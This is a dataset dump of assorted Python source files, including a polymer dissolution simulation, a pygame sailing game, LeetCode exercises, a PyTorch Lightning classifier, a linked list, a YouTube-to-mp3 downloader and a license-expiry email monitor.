str(self.c_ea0) + ' mol/m3')\n print('Initial concentration c_t0:\\t' +\n str(self.c_t0) + ' mol/m3')\n print('Initial concentration c_eae0:\\t' +\n str(self.c_eae0) + ' mol/m3')\n print('Initial concentration c_et0:\\t' +\n str(self.c_et0) + ' mol/m3')\n print('Alcohol boundary concentration:\\t' +\n str(self.c_a_boundary) + ' mol/m3')\n print('Polymer density:\\t' +\n str(self.rho) + ' kg/m3')\n print('Diffusion coefficient:\\t' +\n str(self.d_a) + ' m2/s')\n print('Free volume:\\t' +\n str(self.nu))\n print('Reaction coefficient:\\t' +\n str(self.k0) + 'mol/?')\n print('Simulation stability number:\\t' +\n str(self.calculate_stability()))\n\n def time_step(self):\n \"\"\"\n calculates time step for this class\n :return: time step delta t\n \"\"\"\n return self.time_end / self.nt\n\n def space_step(self):\n \"\"\"\n calculates space step for this class\n :return: space step delta x\n \"\"\"\n return self.length / self.nx\n\n def calculate_stability(self):\n \"\"\"\n calculates stability factor\n :return: stability factor\n \"\"\"\n return self.d_a * self.delta_t / self.delta_x**2\n\n def check_stability(self):\n \"\"\"\n checks whether the problem will be stable\n :return: true or false for stable or unstable\n \"\"\"\n stability_factor = self.calculate_stability()\n if stability_factor > 0.5:\n print('Unstable conditions:\\t' + str(stability_factor))\n print('D_a:\\t' + str(self.d_a))\n print('delta_x:\\t' + str(self.delta_x))\n print('delta_t:\\t' + str(self.delta_t))\n return False\n else:\n return True\n\n def set_initial_conditions(self):\n \"\"\"\n Sets the initial conditions for the concentration\n fields\n :return: initialized concentration field arrays\n \"\"\"\n c_a_temp = self.c_a0 * np.ones((self.nx, ),\n dtype=np.float64)\n c_ea_temp = self.c_ea0 * np.ones((self.nx,),\n dtype=np.float64)\n c_t_temp = self.c_t0 * np.ones((self.nx,),\n dtype=np.float64)\n c_eae_temp = self.c_eae0 * np.ones((self.nx,),\n dtype=np.float64)\n c_et_temp = self.c_et0 * np.ones((self.nx,),\n dtype=np.float64)\n c_e_temp = self.c_e0 * np.ones((self.nx, ),\n dtype=np.float64)\n\n c_a_temp[0], c_a_temp[-1] = self.c_a_boundary, self.c_a_boundary\n\n return c_a_temp, c_ea_temp, c_t_temp, c_eae_temp, c_et_temp, c_e_temp\n\n def reaction_rates(self, i):\n old_settings = np.seterr(under='ignore', over='ignore', invalid='ignore')\n # old_settings = np.seterr(under='print', over='print', invalid='print')\n k = self.k0 * self.c_a[i]\n c_a = self.c_a[i]\n c_ea = self.c_ea[i]\n c_t = self.c_t[i]\n c_eae = self.c_eae[i]\n c_et = self.c_et[i]\n\n r_a = -k * c_et * c_a + k * c_ea * c_t - k * c_a * c_eae + k * c_ea**2\n\n r_ea = -k * c_ea * c_t + k * c_et * c_a - k * c_et * c_ea + \\\n k * c_t * c_eae - -2 * k * c_ea**2 + k * c_a * c_eae\n\n r_t = -k * c_ea * c_t + k * c_a * c_et - k * c_t * c_eae + \\\n k * c_et * c_ea\n\n r_eae = -k * c_t * c_eae + k * c_et * c_ea - k * c_a * c_eae + \\\n k * c_ea**2\n\n r_et = -k * c_a * c_et + k * c_ea * c_t - k * c_t * c_eae + \\\n k * c_et * c_ea\n\n return r_a, r_ea, r_t, r_eae, r_et\n\n def calculate_doc(self, c_et, c_e):\n doc = c_et / c_e\n # doc = c_et / self.c_et0\n # doc = c_e / self.c_e0 this one really doesn't work\n return doc\n\n def run_dissolution(self):\n mass_temp = np.ones((self.nt, ),\n dtype=np.float64)\n mass_temp[0] = self.rho * self.length**3\n space_temp = np.linspace(0.0, self.length,\n num=self.nx, dtype=np.float64)\n times_temp = np.linspace(0.0, self.time_end,\n num=self.nt, dtype=np.float64)\n\n for n in range(1, self.nt):\n # store previous solution for update purposes\n #\n c_a_prev = self.c_a\n c_ea_prev = self.c_ea\n c_t_prev = self.c_t\n c_eae_prev = self.c_eae\n c_et_prev = self.c_et\n c_e_prev = self.c_e\n\n # perform the update on the interior first\n #\n for i in range(1, self.nx - 1):\n fac = self.calculate_stability()\n fac2 = 0.0\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n # p = c_et_prev[i] / c_e_prev[i]\n p = self.calculate_doc(c_et_prev[i], c_e_prev[i])\n # check for dissolved nodes\n #\n if p < self.p_gel:\n self.c_a[i] = self.c_a_boundary\n else:\n self.c_a[i] = c_a_prev[i] + \\\n fac * (c_a_prev[i + 1] - 2 * c_a_prev[i] + c_a_prev[i - 1]) + \\\n self.delta_t * r_a\n\n # update other species\n #\n self.c_ea[i] = c_ea_prev[i] + \\\n fac2 * (c_ea_prev[i + 1] - 2 * c_ea_prev[i] + c_ea_prev[i - 1]) + \\\n self.delta_t * r_ea\n\n self.c_t[i] = c_t_prev[i] + \\\n fac2 * (c_t_prev[i + 1] - 2 * c_t_prev[i] + c_t_prev[i - 1]) + \\\n self.delta_t * r_t\n\n self.c_eae[i] = c_eae_prev[i] + \\\n fac2 * (c_eae_prev[i + 1] - 2 * c_eae_prev[i] + c_eae_prev[i - 1]) + \\\n self.delta_t * r_eae\n\n # now do the boundary conditions on the left boundary\n #\n i = 0\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n self.c_a[i] = self.c_a_boundary\n\n self.c_ea[i] = c_ea_prev[i] + \\\n 2 * fac2 * (c_ea_prev[i+1] - c_ea_prev[i]) + \\\n self.delta_t * r_ea\n self.c_t[i] = c_t_prev[i] + \\\n 2 * fac2 * (c_t_prev[i+1] - c_t_prev[i]) + \\\n self.delta_t * r_t\n self.c_eae[i] = c_eae_prev[i] + \\\n 2 * fac2 * (c_eae_prev[i+1] - c_eae_prev[i]) + \\\n self.delta_t * r_eae\n\n # now do the boundary conditions on the right boundary\n #\n i = self.nx - 1\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n self.c_a[i] = self.c_a_boundary\n\n self.c_ea[i] = c_ea_prev[i] + \\\n 2 * fac2 * (c_ea_prev[i-1] - c_ea_prev[i]) + \\\n self.delta_t * r_ea\n self.c_t[i] = c_t_prev[i] + \\\n 2 * fac2 * (c_t_prev[i-1] - c_t_prev[i]) + \\\n self.delta_t * r_t\n self.c_eae[i] = c_eae_prev[i] + \\\n 2 * fac2 * (c_eae_prev[i-1] - c_eae_prev[i]) + \\\n self.delta_t * r_eae\n\n # update global esther concentration array\n #\n self.c_e = 2 * self.c_eae + self.c_ea + self.c_et\n\n # now calculate the mass loss/gain\n #\n mass_temp[n] = 0.0\n for i in range(1, self.nx - 2):\n # p = self.c_et[i] / self.c_et0\n p = self.calculate_doc(c_et_prev[i], c_e_prev[i])\n\n if p < self.p_gel:\n self.c_a[i] = self.c_a_boundary\n\n swelling_ratio = (self.rho * (1.0 + self.nu * self.c_a[i]))**(1.0/3.0)\n total_rho = self.rho * swelling_ratio\n\n if p >= self.p_gel:\n mass_temp[n] = mass_temp[n] + swelling_ratio * self.delta_x\n\n mass_temp[n] = mass_temp[n] ** 3\n\n return times_temp / 60.0, space_temp, mass_temp / mass_temp[0]\n","sub_path":"BER_paper_2/python/dissolution_class.py","file_name":"dissolution_class.py","file_ext":"py","file_size_in_byte":14778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"456624448","text":"import inputs\nfrom decimal import Decimal\n\ndef getXYZ(prev_coord, prev_gradient):\n \"\"\"\n Returns an integer x,y,z vector from the current controller inputs.\n Allows for continuous controller inputs, or simulates that at least.\n \"\"\"\n speed = 0.01 # Controls the speed the controller outputs change.\n null_zone = 0 # Controls the null margin for the controller.\n\n events = inputs.get_gamepad()\n gradient = prev_gradient\n\n for event in events:\n # print(event.ev_type, event.code, event.state)\n type = str(event.ev_type)\n code = str(event.code)\n state = int(event.state)\n\n if (type == \"Absolute\"):\n state = (state - 127.5) / 127.5 * speed\n\n if (abs(state) < null_zone):\n state = 0\n\n if (code == \"ABS_X\"):\n gradient[0] = state\n elif (code == \"ABS_Y\"):\n gradient[1] = -state\n elif (code == \"ABS_RZ\"):\n gradient[2] = -state\n\n new_coord = [0,0,0]\n for i in range(3):\n new_coord[i] = prev_coord[i] + gradient[i]\n return new_coord, gradient\n\ndef main():\n coord = (0,0,0)\n gradient = (0,0,0)\n while 1:\n coord, gradient = getXYZ(coord, gradient)\n print(coord, gradient)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"ControllerXYZ_Rotation.py","file_name":"ControllerXYZ_Rotation.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"49827385","text":"# Determine whether an integer is a palindrome.\n# An integer is a palindrome when it reads the same backward as forward.\n#\n# Example 1:\n#\n# Input: 121\n# Output: true\n#\n# Example 2:\n#\n# Input: -121\n# Output: false\n# Explanation: From left to right, it reads -121. From right to left, it becomes 121-.\n# Therefore it is not a palindrome.\n#\n# Example 3:\n#\n# Input: 10\n# Output: false\n# Explanation: Reads 01 from right to left. Therefore it is not a palindrome.\n\nimport math\n\n\nclass Solution:\n\n def is_palindrome(self, x: int) -> bool:\n if 0 <= x < 10:\n return True\n elif x < 0:\n return False\n else:\n\n digits = int(math.log10(x)) + 1\n number = x\n\n result = 0\n\n while number % 10 != number:\n temp = number % 10 * pow(10, digits - 1)\n digits -= 1\n result += temp\n number = number // 10\n\n return result + number == x\n","sub_path":"easy/PalindromNumber.py","file_name":"PalindromNumber.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"59960875","text":"from __future__ import unicode_literals\nimport youtube_dl\n\n\n'''\nEach line should consist of a url starting with http...\nie http://www.youtube.com/?watch=whatever\n http....\n http...\nThe titles of each mp3 file will be the same as their respective videos of origin.\n'''\nfname = 'path-to-your-txt-file'\n\n#youtube_dl settings\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ndef separate(line):\n\t#this separates the url and the identifying information, which will be used as the file title\n\t#returns title, url\n\t#if there is no title, it will still return the url along with a blank string as the title\n\t\n\n\ttitle, url = line.split('http')\n\ttry:\n\t\treturn title, 'http' + url\n\texcept:\n\t\ttry:\n\t\t\treturn '', 'http' + url\n\t\texcept:\n\t\t\tprint('file line is not formatted correctly:' + line)\n\ndef download_this_list(list):\n\t#takes a list of titles and urls or just urls\n\t#downloads all videos and extracts mp3's\n\n\tfor x in content:\n\t\ttitle, url = separate(x)\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t ydl.download([url]) \n\n#grabbing the file... (which should consist of titles + the video url or just the urls of each video, one url per line\nwith open(fname) as f:\n\tcontent = f.readlines()\n\ncontent = [x.strip() for x in content] \n\ndownload_this_list(content)\n","sub_path":"youtube-downloader.py","file_name":"youtube-downloader.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"518621441","text":"# SOURCE FOR CODE AND KNOWLEDGE\n# https://www.101computing.net/getting-started-with-pygame/\n# casey & sander you can do next on the website to reach the other parts\n\nimport pygame, random\n#Let's import the Boat Class\nfrom boat import Boat\npygame.init()\n\n#colors\nGREEN = (20, 255, 140)\nGREY = (210, 210 ,210)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nPURPLE = (255, 0, 255)\nBLACK = ( 0, 0, 0)\nWATER = (68, 183, 255)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 63)\n\nSCREENWIDTH=1850\nSCREENHEIGHT=1025\n\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Sailing Simulation\")\n\n#Wind-Text Properties\n#Wind\nfont = pygame.font.Font(None, 52)\ntext = font.render(\"Wind\", 1, WHITE)\nwind = pygame.image.load(\"images/WindArrow.png\")\nwind = pygame.transform.scale(wind, (200, 120))\n\n#This will be a list that will contain all the sprites we intend to use in our game.\nall_sprites_list = pygame.sprite.Group()\n\nBoat1 = Boat(BLUE, 20, 30)\nBoat1.rect.x = 200\nBoat1.rect.y = 300\n\n# Add the car to the list of objects\nall_sprites_list.add(Boat1)\n\n#Allowing the user to close the window...\ncarryOn = True\nclock=pygame.time.Clock()\n\nwhile carryOn:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n carryOn=False\n elif event.type==pygame.KEYDOWN:\n if event.key==pygame.K_x: #Pressing the x Key will quit the game\n carryOn=False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n Boat1.moveLeft(1)\n if keys[pygame.K_RIGHT]:\n Boat1.moveRight(1)\n if keys[pygame.K_UP]:\n Boat1.moveUp(1)\n if keys[pygame.K_DOWN]:\n Boat1.moveDown(1)\n if keys[pygame.K_COMMA]:\n #Boat1.rot_center(5)\n print(type(Boat1.rot_center(5)))\n #Game Logic\n all_sprites_list.update()\n\n #Drawing on Screen\n screen.fill(WATER)\n\n #Draw The Buoys\n pygame.draw.circle(screen, RED, [1600,312],15, 0)\n pygame.draw.circle(screen, RED, [330,512],15, 0)\n pygame.draw.circle(screen, RED, [1600,712],15, 0)\n\n #Wind - Text\n screen.blit(text, (65,455))\n screen.blit(wind, (10,452))\n\n\n\n #Now let's draw all the sprites in one go. (For now we only have 1 sprite!)\n all_sprites_list.draw(screen)\n\n #Refresh Screen\n pygame.display.flip()\n\n #Number of frames per secong e.g. 60\n clock.tick(60)\n\npygame.quit()\n","sub_path":"Final_Blind_Sailing/Previous_Work/blindsail.py","file_name":"blindsail.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"257539534","text":"from solution import Solution\nfrom solution import ListNode\n\nsolution = Solution()\n\n# data = [-11, -3, -6, 12, -15, -13, -7, -3, 13, -2, -10, 3, 12, -12, 6, -6, 12, 9, -2, -12, 14, 11, -4, 11, -8, 8, 0,\n# -12, 4, -5, 10, 8, 7, 11, -3, 7, 5, -3, -11, 3, 11, -13, 14, 8, 12, 5, -12, 10, -8, -7, 5, -9, -11, -14, 9, -12,\n# 1, -6, -8, -10, 4, 9, 6, -3, -3, -12, 11, 9, 1, 8, -10, -3, 2, -11, -10, -1, 1, -15, -6, 8, -7, 6, 6, -10, 7, 0,\n# -7, -7, 9, -8, -9, -9, -14, 12, -5, -10, -15, -9, -15, -7, 6, -10, 5, -7, -14, 3, 8, 2, 3, 9, -12, 4, 1, 9, 1,\n# -15, -13, 9, -14, 11, 9]\n# data = [-4,-1,-4,0,2,-2,-4,-3,2,-3,2,3,3,-4]\n# data = [0, 3, 0, 1, 1, -1, -5, -5, 3, -3, -3, 0]\n# data = [-1, 0, 1, 2, -1, -4]\n# result = solution.threeSum(data)\n\n# print(solution.threeSumClosest([-1,2,1,-4],1))\n\n# print(solution.letterCombinations(\"234\"))\n\n# print(solution.maxCoins([3, 1, 5, 8]))\n\n# print(\"isValid={}\".format(solution.isValid(\"(]\")))\n# print(\"isValid={}\".format(solution.isValid(\"()\")))\n# print(\"isValid={}\".format(solution.isValid(\"\")))\n# print(\"isValid={}\".format(solution.isValid(\"[(){}]\")))\n# print(\"isValid={}\".format(solution.isValid(\"[(){}]()\")))\n\nhead1 = ListNode()\nlist1 = head1\nlist1.val = 1\nlist1.next = ListNode()\nlist1 = list1.next\nlist1.val = 3\nlist1.next = ListNode()\nlist1 = list1.next\nlist1.val = 5\n\nhead2 = ListNode()\nlist2 = head2\nlist2.val = 2\nlist2.next = ListNode()\nlist2 = list2.next\nlist2.val = 4\nlist2.next = ListNode()\nlist2 = list2.next\nlist2.val = 6\n\n\nresult = solution.mergeTwoLists(head1,head2)\nprint(result)\n\nresult = solution.generateParenthesis(3)\nprint(result)\n\nresult = solution.generateParenthesis_2(3)\nprint(result)\n\nresult = solution.generateParenthesis_1(3)\nprint(result)\n\n","sub_path":"src/leetcode/solution_test.py","file_name":"solution_test.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474969891","text":"# This file replaces experiment/train.py\n\nfrom typing import Any, List\n\nimport torch\nfrom pytorch_lightning import LightningModule\nfrom torchmetrics.classification.accuracy import Accuracy\nfrom hydra.utils import instantiate\nimport torchvision\nfrom src.models.modules.head import mark_classifier\nimport torch.nn.functional as F\n\n\nclass ClassificationTraining(LightningModule):\n \"\"\"\n Example of LightningModule for MNIST classification.\n\n A LightningModule organizes your PyTorch code into 5 sections:\n - Computations (init).\n - Train loop (training_step)\n - Validation loop (validation_step)\n - Test loop (test_step)\n - Optimizers (configure_optimizers)\n\n Read the docs:\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html\n \"\"\"\n\n def __init__(\n self,\n module,\n optim,\n training,\n pruning,\n run_id=None,\n **kwargs\n ):\n super().__init__()\n\n # this line ensures params passed to LightningModule will be saved to ckpt\n # it also allows to access params with 'self.hparams' attribute\n self.save_hyperparameters()\n print(self.hparams)\n\n self.test_counter = 0\n\n self.module = instantiate(next(iter(self.hparams.module.values())))\n print(self.module)\n if hasattr(torchvision.models, next(iter(self.hparams.module.values()))._target_.split('.')[-1]):\n print(f\"\\n\\n\\n---------{next(iter(self.hparams.module.values()))._target_.split('.')[-1]}-------\\n\\n\\n\")\n # https://pytorch.org/docs/stable/torchvision/models.html\n mark_classifier(self.module) # add is_classifier attribute\n # Todo: Check if the model is compatible\n\n # loss function\n self.criterion = torch.nn.CrossEntropyLoss()\n\n # use separate metric instance for train, val and test step\n # to ensure a proper reduction over the epoch\n self.train_accuracy = Accuracy()\n self.val_accuracy = Accuracy()\n self.test_accuracy = Accuracy()\n self.train_accuracy5 = Accuracy(top_k=5)\n self.val_accuracy5 = Accuracy(top_k=5)\n self.test_accuracy5 = Accuracy(top_k=5)\n\n def forward(self, x: torch.Tensor):\n return self.module(x)\n\n def step(self, batch: Any):\n x, y = batch\n logits = self.forward(x)\n loss = self.criterion(logits, y)\n preds = torch.argmax(logits, dim=1)\n logits = F.softmax(logits)\n return loss, logits, preds, y\n\n def training_step(self, batch: Any, batch_idx: int):\n loss, logits, _, targets = self.step(batch)\n\n run_id = self.hparams.run_id + '/train' if self.hparams.run_id else 'train'\n # log train metrics\n try:\n acc = self.train_accuracy(logits, targets)\n except:\n acc = 0\n try:\n acc5 = self.train_accuracy5(logits, targets)\n except:\n acc5 = 0\n self.log(f\"{run_id}/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log(f\"{run_id}/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(f\"{run_id}/acc5\", acc5, on_step=False, on_epoch=True, prog_bar=True)\n\n # we can return here dict with any tensors\n # and then read it in some callback or in training_epoch_end() below\n # remember to always return loss from training_step, or else backpropagation will fail!\n return {\"loss\": loss}\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from `training_step()`\n pass\n\n def validation_step(self, batch: Any, batch_idx: int):\n loss, logits, _, targets = self.step(batch)\n\n run_id = self.hparams.run_id + '/val' if self.hparams.run_id else 'val'\n # log val metrics\n try:\n acc = self.val_accuracy(logits, targets)\n except:\n acc = 0\n try:\n acc5 = self.val_accuracy5(logits, targets)\n except:\n acc5 = 0\n self.log(f\"{run_id}/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log(f\"{run_id}/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(f\"{run_id}/acc5\", acc5, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"loss\": loss}\n\n def validation_epoch_end(self, outputs: List[Any]):\n pass\n\n def test_step(self, batch: Any, batch_idx: int):\n loss, logits, preds, targets = self.step(batch)\n\n # log test metrics\n acc = self.test_accuracy(logits, targets)\n acc5 = self.test_accuracy5(logits, targets)\n state = \"before_pruning\" if self.test_counter % 2 == 0 else \"after_pruning\"\n\n self.log(f\"{self.hparams.run_id}/test-{state}/loss\", loss, on_step=False, on_epoch=True)\n self.log(f\"{self.hparams.run_id}/test-{state}/acc\", acc, on_step=False, on_epoch=True)\n self.log(f\"{self.hparams.run_id}/test-{state}/acc5\", acc5, on_step=False, on_epoch=True)\n\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def test_epoch_end(self, outputs: List[Any]):\n pass\n\n def configure_optimizers(self):\n \"\"\"Choose what optimizers and learning-rate schedulers to use in your optimization.\n Normally you'd need one. But in the case of GANs or similar you might have multiple.\n\n See examples here:\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers\n \"\"\"\n return instantiate(next(iter(self.hparams.optim.values())), params=self.module.parameters(), _convert_=\"partial\")\n\n def on_fit_end(self) -> None:\n expr = self.logger.experiment[0]\n expr.summary[f\"{self.hparams.run_id}/best_score\"] = self.trainer.checkpoint_callback.best_model_score\n","sub_path":"src/models/classification_training.py","file_name":"classification_training.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"420059887","text":"from Node import Node\n\n\ndef default_sorting_eval(data):\n \"\"\"\n gets only the raw data! not an node object!!!\n :param data: node.get_data()\n :return: evaluated representation of data\n \"\"\"\n return data\n\n\ndef default_search_eval(data):\n \"\"\"\n gets only the raw data! not an node object!!!\n :param data: node.get_data()\n :return: evaluated representation of data\n \"\"\"\n return data\n\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n\n def __iter__(self):\n tmp = self.head\n while tmp is not None:\n yield tmp\n tmp = tmp.get_next()\n\n def clear(self):\n self.head = None\n\n def attach(self, data):\n self.head = Node(data, self.head)\n\n def attach_sorted(self, data, key=default_sorting_eval):\n # special case: empty list, just insert new node\n if self.head is None:\n return self.attach(data)\n\n # special case: new ist bigger than head\n if key(data) >= key(self.head.get_data()):\n return self.attach(data)\n\n # normal case (also handles special case where it new_node only fits to the end):\n new_node, next_node = Node(data), self.head\n # search for corresponding gap in LL\n while (next_node.get_next() is not None) \\\n and \\\n not (key(next_node.get_data()) >= key(new_node.get_data()) >= key(next_node.get_next().get_data())):\n next_node = next_node.get_next()\n\n new_node.set_next(next_node.get_next()) # print(\"found next_node is %s\" % next_node)\n next_node.set_next(new_node)\n\n def search(self, my_key_data, key=default_sorting_eval):\n for node in self:\n if my_key_data == key(node.get_data()):\n return node\n raise AttributeError\n\n def delete(self, my_key_data, key=default_sorting_eval): # deletes all found, returns list of deleted nodes\n ret = [] # list of deleted elements\n\n # special case: head should be deleted (and the following new heads...):\n while my_key_data == key(self.head.get_data()):\n ret.append(self.head)\n self.head = self.head.get_next()\n\n # normal case:\n next_node = self.head # self.head is now a \"not to be deleted node\"\n while next_node is not None and next_node.get_next() is not None: # 1. part is because of deleted nodes\n if my_key_data == key(next_node.get_next().get_data()): # find matching node\n ret.append(next_node.get_next())\n next_node.set_next(next_node.get_next().get_next())\n next_node = next_node.get_next()\n return ret\n\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n\n for i in [1, 2, 3, 4, 5, 6, 7]:\n ll.attach_sorted(i)\n\n print(\"ok\")\n ll.attach_sorted(8)\n ll.attach_sorted(3.5)\n ll.attach_sorted(0)\n print(\"ok2\")\n\n for itm in ll:\n print(itm)\n\n try:\n print(\"search for 3: \", end=\"\")\n print(ll.search(3))\n print(\"search for 13.37: \", end=\"\")\n print(ll.search(13.37))\n except AttributeError:\n print(\"Not found!!!\")\n\n print(\"###################\")\n\n print(\"Deleting: \")\n print(\"deleted: %s\" % ll.delete(8))\n print(\"deleted: %s\" % ll.delete(3.5))\n print(\"deleted: %s\" % ll.delete(0))\n\n for itm in ll:\n print(itm)\n","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"335319142","text":"from encryption import encrypto\r\nimport configparser\r\nimport datetime\r\nimport sqlite3\r\nimport logging\r\nimport smtplib\r\n\r\ndef get_parser():\r\n config = configparser.ConfigParser()\r\n\r\n return config\r\n\r\ndef get_encrypt():\r\n #create encrypt object\r\n key_object = encrypto('secret.key')\r\n\r\n return key_object\r\n\r\ndef get_logger():\r\n #creates logger object\r\n logger = logging.getLogger(__name__)\r\n \r\n return logger\r\n\r\ndef set_logger(logger):\r\n #set log level\r\n logger.setLevel(logging.INFO)\r\n\r\n #define file handler and set formatter\r\n file_handler = logging.FileHandler('raisensu_log.log')\r\n formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')\r\n file_handler.setFormatter(formatter)\r\n\r\n #add file handler to logger\r\n logger.addHandler(file_handler)\r\n\r\ndef get_smtp_state(config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n smtpState = config['email']['enable_email'].upper()\r\n\r\n return smtpState \r\n\r\ndef get_smtp(config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n smtpServer = config['email']['smtp_server']\r\n smtpObj = smtplib.SMTP(smtpServer)\r\n\r\n return smtpObj\r\n\r\ndef set_smtp(notify, config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n receiver_email = config['email']['receiver_email']\r\n sender_email = config['email']['sender_email']\r\n\r\n message = '''From: <{}>\r\n To: [{}]\r\n MIME-Version: 1.0\r\n Content-type: text/html\r\n Subject: [ALERT] Raisensu License Asset Monitoring\r\n {}\r\n '''.format(sender_email, receiver_email, notify)\r\n\r\n return message\r\n\r\ndef send_smtp(smtpObj, message, config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n receiver_email = config['email']['receiver_email']\r\n sender_email = config['email']['sender_email']\r\n\r\n smtpObj.sendmail(sender_email, receiver_email, message)\r\n\r\n \r\ndef diff_dates(date_today, comp_date):\r\n #convert comp_date to date object\r\n date_time_today = datetime.datetime.strptime(date_today, '%m/%d/%Y')\r\n date_time_comp = datetime.datetime.strptime(comp_date, '%m/%d/%Y')\r\n\r\n #return remaining days\r\n return abs(date_time_comp - date_time_today).days\r\n\r\n\r\ndef get_sql_statement(config, key_object, logger):\r\n #Read in monitor_settings.ini\r\n config.read('monitor_settings.ini')\r\n\r\n conn = sqlite3.connect('asset_database.db')\r\n\r\n cursor = conn.execute('SELECT ID, NAME, LICENSE, EXPIRES FROM ASSETS')\r\n\r\n #get todays date\r\n today = datetime.date.today()\r\n\r\n #str today day,month,year\r\n date_today = today.strftime(\"%m/%d/%Y\")\r\n\r\n #read in from monitor_settings.ini\r\n notify_1 = int(config['dates']['notify_me_in_days_01'])\r\n notify_2 = int(config['dates']['notify_me_in_days_02'])\r\n notify_3 = int(config['dates']['notify_me_in_days_03'])\r\n\r\n for row in cursor:\r\n '''\r\n row[0] return type: int -> ID\r\n row[1] return type: str -> NAME\r\n row[2] return type: str -> LICENSE\r\n row[3] return type: str -> EXPIRES\r\n '''\r\n day_diff = diff_dates(date_today, row[3])\r\n\r\n if day_diff == notify_1:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_1, row[1], key_object.decrypt(row[2]), row[3]))\r\n\r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_1, row[1], key_object.decrypt(row[2]), row[3]))\r\n elif day_diff == notify_2:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_2, row[1], key_object.decrypt(row[2]), row[3]))\r\n \r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_2, row[1], key_object.decrypt(row[2]), row[3]))\r\n elif day_diff == notify_3:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_3, row[1], key_object.decrypt(row[2]), row[3])) \r\n \r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_3, row[1], key_object.decrypt(row[2]), row[3]))\r\n\r\nif __name__ == \"__main__\":\r\n #logger\r\n logger = get_logger()\r\n set_logger(logger)\r\n\r\n #configparser\r\n config = get_parser()\r\n\r\n #encryption\r\n key_object = get_encrypt()\r\n\r\n notify = get_sql_statement(config, key_object, logger)\r\n\r\n #smptp\r\n smtpState = get_smtp_state(config)\r\n \r\n if smtpState == \"TRUE\":\r\n smtpObj = get_smtp(config)\r\n message = set_smtp(notify, config)\r\n send_smtp(smtpObj, message, config)\r\n\r\n\r\n","sub_path":"raisensu_monitor.py","file_name":"raisensu_monitor.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
